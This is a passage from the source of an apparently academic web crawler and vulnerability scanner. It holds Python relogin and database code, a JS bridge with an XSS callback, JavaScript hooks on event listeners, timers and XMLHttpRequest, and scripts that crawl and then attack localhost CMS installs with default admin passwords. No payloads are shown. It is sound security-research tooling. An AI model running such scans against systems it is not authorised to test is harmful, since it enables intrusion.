hopefully_reloggedin_page is None: 158 | retries += 1 159 | logging.debug("Relogin attempt number {} failed".format(retries)) 160 | sleep(2000) 161 | else: 162 | login_form, login_clickable = self._find_form_with_special_parameters(hopefully_reloggedin_page, self.user.login_data) 163 | if login_form is None: 164 | logging.debug("Relogin successfull...continue") 165 | return False 166 | else: 167 | logging.debug("Relogin fails, loginform is still present...") 168 | retries += 1 169 | sleep(2000) 170 | else: 171 | logging.debug("Login form is not there... we can continue (I hope)") 172 | if retries < 3: 173 | return True 174 | else: 175 | return False 176 | raise LoginFailed("We cannot login anymore... stop crawling here") 177 | 178 | 179 | def _get_webpage(self, url): 180 | response_code, result = self._dynamic_analyzer.analyze(url, timeout=10) 181 | self.domain_handler.complete_urls_in_page(result) 182 | self.domain_handler.analyze_urls(result) 183 | self.async_request_handler.handle_requests(result) 184 | return result 185 | 186 | def _check_login_status_with_cookies(self): 187 | if self.cookie_num > 0: 188 | current_cookie_num = count_cookies(self._network_access_manager, self.user.url_with_login_form) 189 | return current_cookie_num >= self.cookie_num 190 | return True 191 | -------------------------------------------------------------------------------- /crawler/core/jsbridge.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import json 19 | from PyQt5.QtCore import QObject, pyqtSlot 20 | 21 | __author__ = 'constantin' 22 | 23 | class JsBridge(QObject): 24 | 25 | def __init__(self, analyzer): 26 | QObject.__init__(self) 27 | self.analyzer = analyzer 28 | self._ajax_request = [] 29 | 30 | @pyqtSlot(str) 31 | def add_eventListener_to_element(self, msg): 32 | msg = json.loads(msg) 33 | self.analyzer.add_eventlistener_to_element(msg) 34 | 35 | @pyqtSlot(str) 36 | def xmlHTTPRequestOpen(self, msg): 37 | msg = json.loads(msg) 38 | self._ajax_request.append(msg) 39 | 40 | @pyqtSlot(str) 41 | def xmlHTTPRequestSend(self, msg): 42 | msg = json.loads(msg) 43 | according_open = self._ajax_request.pop(0) 44 | try: 45 | according_open['parameters'] = msg['parameters'][0] 46 | except IndexError: 47 | according_open['parameters'] = "" 48 | self.analyzer.capturing_requests(according_open) 49 | 50 | @pyqtSlot(str) 51 | def timeout(self, msg): 52 | msg = json.loads(msg) 53 | msg['type'] = "timeout" 54 | self.analyzer.capture_timeout_call(msg) 55 | 56 | @pyqtSlot(str) 57 | def intervall(self, msg): 58 | msg = json.loads(msg) 59 | msg['type'] = "intervall" 60 | #logging.debug(msg) 61 | self.analyzer.capture_timeout_call(msg) 62 | 63 | @pyqtSlot(str) 64 | def add_eventlistener_to_element(self, msg): 65 | msg = json.loads(msg) 66 | #logging.debug(msg) 67 | self.analyzer.add_eventlistener_to_element(msg) 68 | 69 | @pyqtSlot(str) 70 | def attack(self, msg): 71 | self.analyzer.xss_callback(msg) -------------------------------------------------------------------------------- /crawler/database/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it 
under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | -------------------------------------------------------------------------------- /crawler/database/databasemanager.py: -------------------------------------------------------------------------------- 1 | """ 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
class DatabaseManager(object):
    """Facade in front of :class:`Database` that is responsible for storage.

    Pins every database call to the session of the user given at construction
    time, and keeps small MRU caches (newest first) for web pages and delta
    pages. The caches are disabled while MAX_CACHE_SIZE == 0 (the default).
    """

    def __init__(self, user, dropping=True):
        # dropping=True recreates the user's database from scratch.
        self._database = Database(user.username, dropping)
        self._database.insert_user_into_db(user)
        self._web_page_cache = []    # MRU cache of WebPage, newest first
        self._deltapage_cache = []   # MRU cache of DeltaPage, newest first
        self._current_session = None
        self.MAX_CACHE_SIZE = 0      # 0 disables both caches
        self._current_session = user.session  # overwrites the None above

    def return_session_id_to_username(self, username):
        """Look up the stored user record for *username*."""
        return self._database.get_user_to_username(username)

    def store_web_page(self, web_page):
        """Persist *web_page* and (if caching is enabled) front-insert it."""
        if self.MAX_CACHE_SIZE > 0:
            if len(self._web_page_cache) + 1 > self.MAX_CACHE_SIZE:
                del self._web_page_cache[-1]  # evict the oldest entry
            self._web_page_cache.insert(0, web_page)
        self._database.insert_page_into_db(self._current_session, web_page)

    def get_page_to_id(self, page_id):
        """Resolve *page_id* as either a regular web page or a delta page."""
        page = self.get_web_page_to_id(page_id)
        if page is not None:
            return page
        page = self.get_delta_page_to_id(page_id)
        if page is not None:
            return page
        return None

    def store_delta_page(self, delta_page):
        """Persist *delta_page* and (if caching is enabled) front-insert it."""
        if self.MAX_CACHE_SIZE > 0:
            if len(self._deltapage_cache) + 1 > self.MAX_CACHE_SIZE:
                del self._deltapage_cache[-1]  # evict the oldest entry
            self._deltapage_cache.insert(0, delta_page)
        self._database.insert_delta_page_into_db(self._current_session, delta_page)

    def get_page_to_url(self, url):
        """Fetch the stored web page for *url* (QUrl-like object or str)."""
        try:
            url = url.toString()  # EAFP: accept objects exposing toString()
        except AttributeError:
            url = url  # already a plain string

        return self._database.get_webpage_to_url_from_db(self._current_session, url)

    def get_web_page_to_id(self, page_id):
        """Return the cached web page for *page_id*, falling back to the DB."""
        for page in self._web_page_cache:
            if page_id == page.id:
                return page
        return self._database.get_webpage_to_id_from_db(self._current_session, page_id)


    def get_delta_page_to_id(self, delta_page_id):
        """Return the cached delta page for *delta_page_id*, else hit the DB."""
        for page in self._deltapage_cache:
            if delta_page_id == page.id:
                return page

        return self._database.get_delta_page_to_id(self._current_session, delta_page_id)

    def url_exists(self, url):
        return self._database.url_exists(self._current_session, url)

    def get_next_url_for_crawling(self):
        """Pop the next unvisited URL from the crawl frontier."""
        return self._database.get_next_url_for_crawling(self._current_session)

    def get_all_unvisited_urls_sorted_by_hash(self):
        return self._database.get_all_unvisited_urls_sorted_by_hash(self._current_session)

    def insert_url_into_db(self, url):
        return self._database.insert_url_into_db(self._current_session, url)

    def insert_redirected_url(self, url):
        # Same as insert_url_into_db but flags the URL as a redirect target.
        return self._database.insert_url_into_db(self._current_session, url, is_redirected_url=True)

    def visit_url(self, url, webpage_id, response_code, redirected_to = None):
        """Mark *url* as visited, linking it to the resulting page/response."""
        self._database.visit_url(self._current_session, url, webpage_id, response_code, redirected_to)

    def extend_ajax_requests_to_webpage(self, webpage, ajax_reuqests):
        # (sic) parameter name kept for interface compatibility.
        self._database.extend_ajax_requests_to_webpage(self._current_session, webpage, ajax_reuqests)


    def get_all_crawled_delta_pages(self, url=None):
        return self._database.get_all_crawled_deltapages_to_url_from_db(self._current_session, url)


    def update_clickable(self, web_page_id, clickable):
        """Persist the crawl outcome for *clickable* on page *web_page_id*:
        ignored/unsupported clickables are stored separately from clicked ones."""
        if clickable.clickable_type == ClickableType.IgnoredByCrawler or clickable.clickable_type == ClickableType.UnsupportedEvent:
            self._database.set_clickable_ignored(self._current_session, web_page_id, clickable.dom_address, clickable.event, clickable.clickable_depth, clickable.clickable_type)
        else:
            self._database.set_clickable_clicked(self._current_session, web_page_id, clickable.dom_address, clickable.event, clickable.clickable_depth, clickable.clickable_type, clickable.links_to)

    def get_url_structure(self, hash):
        # NOTE(review): duplicate of get_url_structure_to_hash below.
        return self._database.get_url_structure_from_db(self._current_session, hash)

    def insert_url_structure(self, url_description):
        # NOTE(review): duplicate of insert_url_structure_into_db below.
        self._database.insert_url_structure_into_db(self._current_session, url_description)

    def get_all_pages(self):
        return self._database.get_all_pages(self._current_session)

    def get_url_structure_to_hash(self, url_hash):
        return self._database.get_url_structure_from_db(self._current_session,url_hash)

    def insert_url_structure_into_db(self, url_description):
        self._database.insert_url_structure_into_db(self._current_session, url_description)

    def get_url_to_id(self, id):
        return self._database.get_url_to_id(self._current_session, id)

    def write_clusters(self, url_hash, clusters):
        self._database.write_cluster(self._current_session, url_hash, clusters)

    def get_clusters(self, url_hash):
        return self._database.get_clusters(self._current_session, url_hash)

    def count_visited_url_per_hash(self, url_hash):
        return self._database.count_visited_urls_per_hash(self._current_session, url_hash)

    def get_all_url_structures(self):
        return self._database.get_all_url_structures(self._current_session)

    def get_all_visited_urls(self):
        return self._database.get_all_successfully_visited_urls(self._current_session)

    def get_one_visited_url_per_structure(self):
        return self._database.get_one_visited_url_per_structure(self._current_session)

    def insert_attack_result(self, result, attack_url):
        self._database.insert_attack_result(self._current_session, result, attack_url)

    def get_asyncrequest_structure(self, structure_hash=None):
        return self._database.get_asyncrequest_structure(self._current_session, structure_hash)

    def get_all_get_forms(self):
        return self._database.get_all_get_forms(self._current_session)

    def get_one_form_per_destination(self):
        return self._database.get_one_form_per_destination(self._current_session)

    def num_of_ignored_urls(self, url_hash):
        return self._database.num_of_ignored_urls(self._current_session, url_hash)

    def url_visited(self, url):
        return self._database.url_visited(self._current_session, url)

    def get_id_to_url(self, url):
        return self._database.get_id_to_url(self._current_session, url)

    def get_all_urls_to_domain(self, domain):
        return self._database.get_all_urls_to_domain(self._current_session, domain)
16 | ''' 17 | 18 | import logging 19 | 20 | from attacker import Attacker 21 | from crawler import Crawler 22 | from database.databasemanager import DatabaseManager 23 | from utils.config import CrawlConfig, AttackConfig 24 | from models.utils import CrawlSpeed 25 | from utils.user import User 26 | import csv 27 | from utils.utils import calculate_similarity_between_pages 28 | 29 | logging.basicConfig(level=logging.DEBUG, 30 | format='%(asctime)s: %(levelname)s - %(message)s', 31 | #filename='Attack.log', 32 | #filemode='w' 33 | ) 34 | 35 | if __name__ == '__main__': 36 | logging.info("Crawler started...") 37 | 38 | # This is for example to crawl a wordpress installation as logged in user 39 | user = User("Wordpress", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC") 40 | 41 | url = "http://localhost/" 42 | 43 | # This is the confuigrtion I used for the experiments 44 | crawler_config = CrawlConfig("jÄk", url, max_depth=3, max_click_depth=3, crawl_speed=CrawlSpeed.Fast) 45 | attack_config = AttackConfig(url) 46 | 47 | database_manager = DatabaseManager(user, dropping=True) 48 | # Uncomment out the end of the next line to use a proxy 49 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082) 50 | crawler.crawl(user) 51 | logging.info("Crawler finished") 52 | 53 | logging.info("Start attacking...") 54 | attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082) 55 | attacker.attack(user) 56 | logging.info("Finish attacking...") -------------------------------------------------------------------------------- /crawler/experiments_paper.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published 
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s: %(levelname)s - %(message)s',
                    #datefmt='%d.%m.%Y %H:%M:%S.%f',
                    #filename='Attack.log',
                    #filemode='w'
                    )

if __name__ == '__main__':
    logging.info("Crawler started...")

    # Target configurations used for the paper's experiments; exactly one
    # `user` line is active at a time, the rest are kept for reference.
    #user = User("WordpressX", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")
    #user = User("constantin", 0, "http://localhost:8080/", login_data = {"username" : "admin", "pass" : "admin"})
    user = User("Test42", 0, "http://localhost:8080/", login_data = {"user": "admin", "password": "admin"}, session="ABC")
    #user = User("constantin", 0, "http://localhost:8080/", login_data = {"username": "admin", "password": "admin"})
    #user = User("Gallery2", 0, "http://localhost:8080/", login_data= {"name": "admin", "password": "34edbc"}, session= "ABC")
    #user = User("Gallery41", 0, session="ABC")
    #user = User("PHPbb64", 0, "http://localhost:8080/phpbb/ucp.php?mode=login", login_data = {"username": "admin", "password": "adminadmin"}, session= "ABC")
    #user = User("Joomla", 0, "http://localhost:8080/", login_data = {"username": "admin", "password": "admin"}, session= "ABC")
    #user = User("ModX", 0 , "http://localhost:8080/manager/", login_data= {"username": "admin", "password": "adminadmin"}, session="ABC")
    #user = User("Pimcore", 0, "http://localhost:8080/admin/login/", login_data={"username": "admin", "password": "admin"}, session="ABC")
    #user = User("Piwigo", 0, "http://localhost:8080/", login_data={"username": "admin", "password": "admin"}, session="ABC")
    #user = User("Concret5", 0, "http://localhost:8080/index.php/login", login_data={"uName": "admin", "uPassword": "admin"})
    #user = User("Mediawiki", 0)
    #user = User("MyBB2", 0, "http://localhost:8080/index.php", login_data= {"quick_username": "admin", "quick_password": "admin"}, session="ABC")
    #user = User("MyBB2", 0, "http://localhost:8080/admin/index.php", login_data= {"username": "admin", "password": "admin"}, session="ABC")
    #user = User("local", 0)

    url = "http://localhost:8080/"
    crawler_config = CrawlConfig("Database Name", url, max_depth=2, max_click_depth=5, crawl_speed=CrawlSpeed.Fast)
    attack_config = AttackConfig(url)

    database_manager = DatabaseManager(user, dropping=True)
    crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
    crawler.crawl(user)
    # TODO: It seems to be that, there is an error if we instanciate crawler and attacker and then call the crawl function. Maybe use one global app!
    logging.info("Crawler finished")
    logging.info("Start attacking...")
    #attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
    #attacker.attack(user)
    logging.info("Finish attacking...")
8 | * 9 | *This program is distributed in the hope that it will be useful, 10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | * GNU General Public License for more details. 13 | * 14 | * You should have received a copy of the GNU General Public License 15 | * along with this program. If not, see . 16 | */ 17 | 18 | // This js wrapps the open function from XMLHttpRequest 19 | callbackWrap(XMLHttpRequest.prototype, 'open', 0, XMLHTTPObserverOpen); 20 | callInterceptionWrapper(XMLHttpRequest.prototype, 'send', 0, XMLHTTPObserverSend); -------------------------------------------------------------------------------- /crawler/js/ajax_observer.js: -------------------------------------------------------------------------------- 1 | /* 2 | *Copyright (C) 2015 Constantin Tschuertz 3 | * 4 | * This program is free software: you can redistribute it and/or modify 5 | * it under the terms of the GNU General Public License as published by 6 | * the Free Software Foundation, either version 3 of the License, or 7 | * any later version. 8 | * 9 | *This program is distributed in the hope that it will be useful, 10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | * GNU General Public License for more details. 13 | * 14 | * You should have received a copy of the GNU General Public License 15 | * along with this program. If not, see . 
/*
 * Simulate.js from https://github.com/airportyh/simulate.js
 * Vendored third-party helper: dispatches synthetic DOM events so the
 * crawler can trigger page event handlers programmatically.
 */
!function() {
	// Shallow-copy all enumerable properties of src onto dst.
	function extend(dst, src) {
		for ( var key in src)
			dst[key] = src[key]
		return src
	}
	var Simulate = {
		// Fire a generic HTML event (click, focus, submit, ...) on element,
		// using createEvent where available, legacy IE fireEvent otherwise.
		event : function(element, eventName) {
			if (document.createEvent) {
				var evt = document.createEvent("HTMLEvents")
				evt.initEvent(eventName, true, true)
				element.dispatchEvent(evt)
			} else {
				var evt = document.createEventObject()
				element.fireEvent('on' + eventName, evt)
			}
		},
		// Fire a keyboard event; options may override the defaults below.
		keyEvent : function(element, type, options) {
			var evt, e = {
				bubbles : true,
				cancelable : true,
				view : window,
				ctrlKey : false,
				altKey : false,
				shiftKey : false,
				metaKey : false,
				keyCode : 0,
				charCode : 0
			}
			extend(e, options)
			if (document.createEvent) {
				try {
					// Try Gecko-style KeyEvents first ...
					evt = document.createEvent('KeyEvents')
					evt.initKeyEvent(type, e.bubbles, e.cancelable, e.view,
							e.ctrlKey, e.altKey, e.shiftKey, e.metaKey,
							e.keyCode, e.charCode)
					element.dispatchEvent(evt)
				} catch (err) {
					// ... fall back to a generic event carrying the same fields.
					evt = document.createEvent("Events")
					evt.initEvent(type, e.bubbles, e.cancelable)
					extend(evt, {
						view : e.view,
						ctrlKey : e.ctrlKey,
						altKey : e.altKey,
						shiftKey : e.shiftKey,
						metaKey : e.metaKey,
						keyCode : e.keyCode,
						charCode : e.charCode
					})
					element.dispatchEvent(evt)
				}
			}
		}
	}
	Simulate.keypress = function(element, chr) {
		var charCode = chr.charCodeAt(0)
		this.keyEvent(element, 'keypress', {
			keyCode : charCode,
			charCode : charCode
		})
	}
	Simulate.keydown = function(element, chr) {
		var charCode = chr.charCodeAt(0)
		this.keyEvent(element, 'keydown', {
			keyCode : charCode,
			charCode : charCode
		})
	}
	Simulate.keyup = function(element, chr) {
		var charCode = chr.charCodeAt(0)
		this.keyEvent(element, 'keyup', {
			keyCode : charCode,
			charCode : charCode
		})
	}
	Simulate.change = function(element) {
		// Note: dispatched with bubbles=false, unlike the generic event().
		var evt = document.createEvent("HTMLEvents");
		evt.initEvent("change", false, true);
		element.dispatchEvent(evt);

	}
	//Simulate.click = function(element){
	//	element.click();
	//}
	// Generate one Simulate.<name> helper per supported event name.
	var events = ['click','focus', 'blur', 'dblclick', 'input', 'mousedown',
			'mousemove', 'mouseout', 'mouseover', 'mouseup', 'resize',
			'scroll', 'select', 'submit', 'load', 'unload', 'mouseleave' ]
	for (var i = events.length; i--;) {
		var event = events[i]
		Simulate[event] = (function(evt) {
			return function(element) {
				this.event(element, evt)
			}
		}(event))
	}
	// Export for CommonJS, browser global, or AMD - whichever exists.
	if (typeof module !== 'undefined') {
		module.exports = Simulate
	} else if (typeof window !== 'undefined') {
		window.Simulate = Simulate
	} else if (typeof define !== 'undefined') {
		define(function() {
			return Simulate
		})
	}
}();
// Replace object[property] with a version that first reports the call to
// wrapperFactory(thisArg, arguments) and then forwards to the original.
// Returns the original function. (argumentIndex is currently unused.)
function callbackWrap(object, property, argumentIndex, wrapperFactory) {
	var original = object[property];
	object[property] = function() {
		wrapperFactory(this, arguments);
		return original.apply(this, arguments);
	}
	return original;
}

// Clamp for setTimeout/setInterval delays, in milliseconds.
var max_waiting_time = 65000
var min_waiting_time = 0

// Like callbackWrap, but additionally caps the delay argument (arguments[1])
// at max_waiting_time so the crawler never waits longer than 65 seconds.
function timingCallbackWrap(object, property, argumentIndex, wrapperFactory) {
	var original = object[property];

	object[property] = function() {
		if (arguments[1] > max_waiting_time) {
			arguments[1] = max_waiting_time
		}
		wrapperFactory(this, arguments);
		return original.apply(this, arguments);
	}
	return original;
}

// Replace object[property] so the ORIGINAL IS NEVER CALLED - only the
// wrapper runs (used by ajax_interceptor.js to swallow XMLHttpRequest.send).
function callInterceptionWrapper(object, property, argumentIndex,
		wrapperFactory) {
	var original = object[property];
	object[property] = function() {
		wrapperFactory(this, arguments);
		return null;
	}
	return original;
}

// Report XMLHttpRequest.open(method, url, ...) to the Python bridge and tag
// the request object with a random id.
// NOTE(review): resp/random_num leak as implicit globals; jaeks_id is set
// here but never transmitted - open/send pairing happens FIFO in Python.
function XMLHTTPObserverOpen(elem, args) {
	resp = {
		"url" : args[1],
		"method" : args[0]
	};
	random_num = Math.floor((Math.random() * 10000) + 1);
	//console.log("Uniq Id set: " + random_num);
	elem.jaeks_id = random_num;
	resp = JSON.stringify(resp);
	jswrapper.xmlHTTPRequestOpen(resp)
}

// Report the XMLHttpRequest.send(body) parameters to the Python bridge.
function XMLHTTPObserverSend(elem, args) {
	elems = []
	for (i = 0; i < args.length; i++) {
		elems.push(args[i])
	}
	resp = {
		"parameters" : elems
	};
	//console.log("Uniq Id: " + elem.jaeks_id);
	resp = JSON.stringify(resp)
	jswrapper.xmlHTTPRequestSend(resp)
}

// setTimeout hook: identifies the callback by the MD5 of its source text.
function timeoutWrapper(elem, args) {
	function_id = MD5(args[0].toString());
	resp = {
		"function_id" : function_id,
		"time" : args[1]
	};
	resp = JSON.stringify(resp)
	jswrapper.timeout(resp)
}

// setInterval hook, same payload shape as timeoutWrapper.
function intervallWrapper(elem, args) {
	function_id = MD5(args[0].toString());
	resp = {
		"function_id" : function_id,
		"time" : args[1]
	};
	resp = JSON.stringify(resp)
	jswrapper.intervall(resp)
}

// Build an absolute XPath ("/html/body/div[2]/...") for element by walking
// up the tree, disambiguating with a 1-based index among same-tag siblings;
// returns "" on any error.
function getXPath(element) {
	try {
		var xpath = '';
		for (; element && element.nodeType == 1; element = element.parentNode) {
			var sibblings = element.parentNode.childNodes;
			var same_tags = []
			for (var i = 0; i < sibblings.length; i++) { // collect same-tag siblings
				if (element.tagName === sibblings[i].tagName) {
					same_tags[same_tags.length] = sibblings[i]
				}
			}

			var id = same_tags.indexOf(element) + 1;
			id > 1 ? (id = '[' + id + ']') : (id = '');
			xpath = '/' + element.tagName.toLowerCase() + id + xpath;
		}
		return xpath;
	} catch (e) {
		console.log("Error: " + e)
		return "";
	}
}
// Build the JSON payload for one element/event pair and hand it to the
// Python bridge (jswrapper). function_id is the MD5 of the handler source
// for real registrations, or "" for synthetic/derived ones.
function reportEventListener(element, eventName, function_id) {
	var resp = {
		"event" : eventName,
		"function_id" : function_id,
		"addr" : getXPath(element),
		"id" : element.id,
		"tag" : element.tagName,
		"class" : element.className
	};
	jswrapper.add_eventListener_to_element(JSON.stringify(resp));
}

// Called whenever the page registers an event listener on an Element.
// Reports the registration itself, plus derived registrations: for "change"
// listeners, every radio/checkbox input, select and option below the element;
// for "click" listeners on a TABLE, every button below it.
function addEventListenerWrapper(elem, args) {
	var dom_adress = getXPath(elem);
	// Only elements attached under the document body have a usable XPath.
	if (dom_adress.indexOf("/html/body") == -1) {
		console.log("Domadress is not valid: " + dom_adress)
		return
	}
	reportEventListener(elem, args[0], MD5(args[1].toString()));
	if (args[0] == "change") {
		var inputs = elem.querySelectorAll("input");
		var selects = elem.querySelectorAll("select");
		var options = elem.querySelectorAll("option");

		for (var i = 0; i < inputs.length; i++) {
			var e = inputs[i];
			if (e.getAttribute("type") == "radio"
					|| e.getAttribute("type") == "checkbox") {
				reportEventListener(e, "change", "");
			}
		}
		for (var j = 0; j < selects.length; j++) {
			reportEventListener(selects[j], "change", "");
		}
		// BUGFIX: the original iterated with xx but indexed options[i] - a
		// stale index left over from the input loop - so every option
		// reported the same wrong element. Index with the loop variable.
		for (var xx = 0; xx < options.length; xx++) {
			reportEventListener(options[xx], "change", "");
		}
	}
	if (elem.tagName == "TABLE" && args[0] == "click") {
		var candidates = elem.querySelectorAll("button");
		for (var xx = 0; xx < candidates.length; xx++) {
			reportEventListener(candidates[xx], "click", "");
		}
	}
}

// Called for listeners registered on the Document itself; these are pinned
// to the fixed address /html/body with tag "body".
function bodyAddEventListenerWrapper(elem, args) {
	var resp = {
		"event" : args[0],
		"function_id" : MD5(args[1].toString()),
		"addr" : "/html/body",
		"id" : elem.id,
		"tag" : "body",
		"class" : elem.className
	}
	resp = JSON.stringify(resp)
	jswrapper.add_eventListener_to_element(resp)

}
16 | */ 17 | 18 | 19 | function catch_properties(){ 20 | var elems = document.getElementsByTagName('*') 21 | // console.log(elems.length + " elems found...") 22 | for (my_counter_i = 0; my_counter_i < elems.length; my_counter_i++) { 23 | events = [] 24 | tag = elems[my_counter_i].tagName 25 | dom_address = "" 26 | id = elems[my_counter_i].id 27 | if (elems[my_counter_i].onclick != null) { 28 | events.push({"method": "onclick", "func": elems[my_counter_i].onclick}) 29 | } 30 | if (elems[my_counter_i].onmouseover != null) { 31 | events.push({"method": "onmouseover", "func": elems[my_counter_i].onmouseover}) 32 | } 33 | if (elems[my_counter_i].onabort != null) { 34 | events.push({"method": "onabort", "func": elems[my_counter_i].onabort}) 35 | } 36 | if (elems[my_counter_i].onblur != null) { 37 | events.push({"method": "onblur", "func": elems[my_counter_i].onblur}) 38 | } 39 | if (elems[my_counter_i].onchange != null) { 40 | events.push({"method": "onchange", "func": elems[my_counter_i].onchange}) 41 | } 42 | if (elems[my_counter_i].onblclick != null) { 43 | events.push({"method": "onblclick", "func": elems[my_counter_i].onblclick}) 44 | } 45 | if (elems[my_counter_i].onerror != null) { 46 | events.push({"method": "onerror", "func": elems[my_counter_i].onerror}) 47 | } 48 | if (elems[my_counter_i].onfocus != null) { 49 | events.push({"method": "onfocus", "func": elems[my_counter_i].onfocus}) 50 | } 51 | if (elems[my_counter_i].onkeydown != null) { 52 | events.push({"method": "onkeydown", "func": elems[my_counter_i].onkeydown}) 53 | } 54 | if (elems[my_counter_i].onkeypress != null) { 55 | events.push({"method": "onkeypress", "func": elems[my_counter_i].onkeypress}) 56 | } 57 | if (elems[my_counter_i].onkeyup != null) { 58 | events.push({"method": "onkeyup", "func": elems[my_counter_i].onkeyup}) 59 | } 60 | if (elems[my_counter_i].onmousedown != null) { 61 | events.push({"method": "onmousedown", "func": elems[my_counter_i].onmousedown}) 62 | } 63 | if 
(elems[my_counter_i].onmousemove != null) { 64 | events.push({"method": "onmousemove", "func": elems[my_counter_i].onmousemove}) 65 | } 66 | if (elems[my_counter_i].onmouseout != null) { 67 | events.push({"method": "onmouseout", "func": elems[my_counter_i].onmouseout}) 68 | } 69 | if (elems[my_counter_i].onmouseup != null) { 70 | events.push({"method": "onmouseup", "func": elems[my_counter_i].onmouseup}) 71 | } 72 | //console.log("We have: " + events.length + " events"); 73 | if (events.length > 0) { 74 | elem = elems[my_counter_i] 75 | dom_adress = getXPath(elem); 76 | html_class = elems[my_counter_i].className; 77 | for (my_counter_j = 0; my_counter_j < events.length; my_counter_j++) { 78 | function_id = MD5(events[my_counter_j].func.toString()) 79 | f = events[my_counter_j].func.toString() 80 | e = events[my_counter_j].event_type 81 | //clickable = JSON.parse(events[j]) 82 | tut1 = events[my_counter_j]; 83 | resp = { 84 | "function_id" : function_id, 85 | "event" : events[my_counter_j].method, 86 | "id" : id, 87 | "tag" : tag, 88 | "addr" : dom_adress, 89 | "class" : html_class 90 | } 91 | resp = JSON.stringify(resp); 92 | jswrapper.add_eventlistener_to_element(resp) 93 | } 94 | } 95 | 96 | } 97 | } 98 | 99 | catch_properties(); -------------------------------------------------------------------------------- /crawler/js/timing_wrapper.js: -------------------------------------------------------------------------------- 1 | /* 2 | *Copyright (C) 2015 Constantin Tschuertz 3 | * 4 | * This program is free software: you can redistribute it and/or modify 5 | * it under the terms of the GNU General Public License as published by 6 | * the Free Software Foundation, either version 3 of the License, or 7 | * any later version. 8 | * 9 | *This program is distributed in the hope that it will be useful, 10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program. If not, see .
 */


// This JS-Script wrapps the addEventListener-Function, that is used by JQuery
timingCallbackWrap(window, "setTimeout", 0, timeoutWrapper);
timingCallbackWrap(window, "setInterval", 0, intervallWrapper);
--------------------------------------------------------------------------------
/crawler/main.py:
--------------------------------------------------------------------------------
'''
Copyright (C) 2015 Constantin Tschuertz

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see .
'''


# Entry point: configures a crawl run (optionally with a logged-in user),
# runs the crawler and then the attacker against the collected results.
import logging

from attacker import Attacker
from crawler import Crawler
from database.databasemanager import DatabaseManager
from utils.config import CrawlConfig, AttackConfig
from models.utils import CrawlSpeed
from utils.user import User
import csv  # NOTE(review): csv and calculate_similarity_between_pages are unused in this script
from utils.utils import calculate_similarity_between_pages

# Here you can specify the logging. Now it logs to the console. If you uncomment the two lines below, then it logs in the file.
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s: %(levelname)s - %(message)s',
                    #filename='Attack.log',
                    #filemode='w'
                    )

if __name__ == '__main__':


    # In the Userobject, the first string you set is the name of the crawl run and also the name of the created database.
    # So if you want to keep old runs then just give different names for each crawl


    # The first of the line below, starts a scan with a logged in user.
    # Parameter desc: Name of DB - Privilege level: deprecated(Just let it 0) - URL where the login form is stored - login data as dict. The key is the parameter name in the login form that has to be set -
    # session: reflects the session within a DB. It is deprecated. Just set it to ABC
    #user = User("WordpressX", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")


    # Crawl without user session. Parameter desc: Name of DB - Privilege level - session
    user = User("Test", 0, session="ABC")

    url = "http://localhost/"
    # Creates the crawler config: URL: start url of the crawler(independent from login) - max_dept: how deep to crawl(link), max_click_depth: how deep to follow events - Crawlspeed: Fast is the best value here
    crawler_config = CrawlConfig("Some Name, doesn't matter", url, max_depth=1, max_click_depth=2, crawl_speed=CrawlSpeed.Fast)

